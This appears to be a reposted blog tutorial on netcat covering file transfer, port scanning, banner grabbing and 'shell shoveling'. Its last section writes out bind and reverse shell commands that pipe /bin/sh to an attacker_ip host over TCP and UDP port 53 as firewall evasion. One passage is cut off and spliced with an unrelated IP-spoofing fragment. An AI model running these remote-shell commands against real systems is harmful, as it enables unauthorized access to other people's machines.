Netcat has a compile-time option that makes netcat execute a program for the connecting or listening process. This is useful for sending a shell to the attacker. Also note that the switches might be different on different platforms, ie. OpenBSD is lacking the -p switch.
To download the Unix/Win version of the tool, check the links below. The great thing about this tool is that it is free and still has many uses. This paper will not cover everything netcat can do, so just explore it's ways.
Unix: http://www.4shared.com/get/305121971/81e7c90c/nc110.html
Win: http://www.4shared.com/get/305124963/412c6953/nc11nt.html
Alternatives to netcat are listed below. Cryptcat encrypts traffic and could be useful to avoid detection, transfer sensitive forensics-data or for example encrypt the data while you do a penetration test against a customer over the Internet. SoCat is netcat on steroids, some like it, some don'thttp://farm9.com/content/Free_Tools/Cryptcat - Encrypted traffic with Blowfishhttp://www.dest-unreach.org/socat/ - Netcat with extended design & features
We also want to mention stunnel, as it can be used as standalone or in conjunction with netcat to check SSL-enabled services.http://www.stunnel.org/ - Useful if you need to do stuff with HTTPS
Ok, now that we are done with this, lets check some examples this can be used for. We start with some transferring of files and move on to portscanning, banner-grabbing and finally how to achieve an interactive shell, aka shoveling a shell.
Transferring files
When we want to send a file from a host to another with netcat, it is quite simple. We set up the receiving host to listen on a specific port and put all the data received into a file. We need to set a timeout so the listener notices when there is no more data coming and it can close gracefully.
-l = listens for incoming connections
-p = what port to listen on
-v = verbosity level, use twice for more information
-w = timeout
-n = dont resolve IPs
On the senders end we simply connect to the receivers listening port and give the file as input. The filetransfer goes smoothly as long as you remember to initiate the sending before the timeout.
Listener: nc -vvn -l -p 3000 -w 3 > file
Sender: nc -vvn xxx.xxx.xxx.xx 3000 <>
This however requires you to bind the spoofed IP to your interface, in Linux it can be done by typing 'ifconfig eth0:n spoofed_ip', where n is the next free alias. This will cause problems with the host you're spoofing, as you broadcast the same IP on the network. To perform similar stuff without causing that much problems, you could check out hping (http://www.hping.org).
Portscanning
It is also possible to do portscans with netcat with using the flag -z (zero I/O mode), that only connects and disconnects from a port. To perform a UDP-scan, you use the flag -u.
TCP: nc -vvn -z xxx.xxx.xxx.xxx start-end
UDP: nc -u -vvn -z xxx.xxx.xxx.xxx start-end
In the snippet below we attempt to scan TCP-ports 79 to 81 to find open ports on a target. As you can see, closed ports report "Connection refused" and open ports report "open". UDP scan output is basically the same.
Code:
:~$ nc -vvn -z 10.0.0.1 79-81
(UNKNOWN) [10.0.0.1] 81 (hosts2-ns) : Connection refused
(UNKNOWN) [10.0.0.1] 80 (http) open
(UNKNOWN) [10.0.0.1] 79 (finger) : Connection refused
sent 0, rcvd 0
Banner-grabbing
In banner-grabbing we send some specific strings to the target from a file and get in response, if any ports are open, the results will be outputted to your screen. In the example below we have included some basic for-loop for scanning multiple targets a time, for example machines we have found in our port-scan above.
Get.txt would contain head / http/1.0 and two returns, or just two returns and it would work on other ports too. Iplist.txt would contain IPs that you want to scan.
Win: for /f %1 in (iplist.txt) do nc -vvn %1 80 < Get.txt Unix: for f in `cat iplist.txt`; do nc $f 80 < Get.txt; done; Code: :~$ for f in `cat iplist.txt`; do nc $f 80 < get.txt; done (UNKNOWN) [10.0.0.2] 80 (http) : Connection refused HTTP/1.0 200 OK Server: Microsoft IIS/5.0 Content-Type: text/html; charset=iso-8859-1 Date: Thu, 29 May 2003 09:35:08 GMT Last-Modified: Sun, 18 May 2003 11:51:07 GMT Accept-Ranges: bytes Connection: close Content-Length: 13640 By now you probably have realized that you might actually also be able to send an exploit against the target by using netcat.. When HTTPS is involved, you might want to look into stunnel by tunneling nc through it or just using stunnel itself: (echo "HEAD / HTTP/1.0"; echo; ) | /usr/sbin/stunnel -c -r host:port Shell Shoveling - TCP This is probably the part that some have been waiting for, shell shoveling. We assume that you have managed to upload netcat to the target in some way, wether it has happened through a vulnerable web-application or whatever. We also assume you are able to issue commands on the target (how else could you use your netcat that is sitting there?). If there is no firewall protecting the target, or there is a misconfiguration in the firewall (ie. allowing tcp/53 to all hosts), the attacker could put up a nc-listener that shovels back an interactive shell the following way assuming -e flag has been compiled in the binary): On the target: nc -l -p port -e shell (shell can be /bin/sh or cmd.exe for example) From the attacker: nc target_ip port In the example below, the attacker connects to the listening netcat and starts issuing commands. As you see, the answers from the target comes directly and the output might be a bit hard to read in sense of where command begins and where output ends. Code: :~$ nc -vvn 10.0.0.1 3000 Connection to 10.0.0.1 3000 port [tcp/*] succeeded! id uid=1000(nobody) gid=1000(nogroup) ls vulnerable.cgi nc cd .. ls cgi-bin index.html mega_secret_document If there is however a firewall in place that stops the attacker from connecting to a specific *free* port on the target-system, they could try to get the target to connect back to them. This is possible only if the firewall allows certain outgoing connections: On the attacker: nc -l -p port From the target: nc -e /bin/sh attacker_ip port In the case where nc has not been compiled with the -e option, there is still ways to shovel back a shell to the attacker. By piping stdin to another listener and stdout to another, the attacker gets one console for issuing commands and one console for the results: On the attacker: nc -l -p port1 nc -l -p port2 From the target: nc attacker_ip port1 | /bin/sh | nc attacker_ip port2 Shell Shoveling - UDP In the case where TCP is restricted, one has to check for possible UDP avenues. UDP however is unreliable, but it can work, and allows spoofing if there is need for it. After testing it, we concluded that it has to be used in the two console way. It wasn't working without echoing an initial character: On the attacker: nc -l -u -p port1 nc -l -u -p port2 From the target: echo "" | nc -u attacker_ip port1 | /bin/sh | nc -u attacker_ip port2 This way however means that there is two udp-ports available. There is another way where one port is enough. This usually means port 53 as it could be wrongly configured at the firewall level, allowing it both ways: On attacker: nc -l -u -p 53 On target: nc -u -l -p 53 | /bin/sh | nc -u attacker_ip 53 From attacker: cat | nc -u target_ip 53 By using this way, the attacker has again a command console and an output console available. One should remember that if using ports under 1024, there must be access equivalent to system/root/administrator available. UDP method would not work behind a NATted environment. End notes As an end note, we like to say that use your own imagination. Netcat is not called the Swiss Army Knife of networking tools for nothing. This post is not written by me. I just found it on net while browsing and hence added it here for my readers.
0 comments:
Post a Comment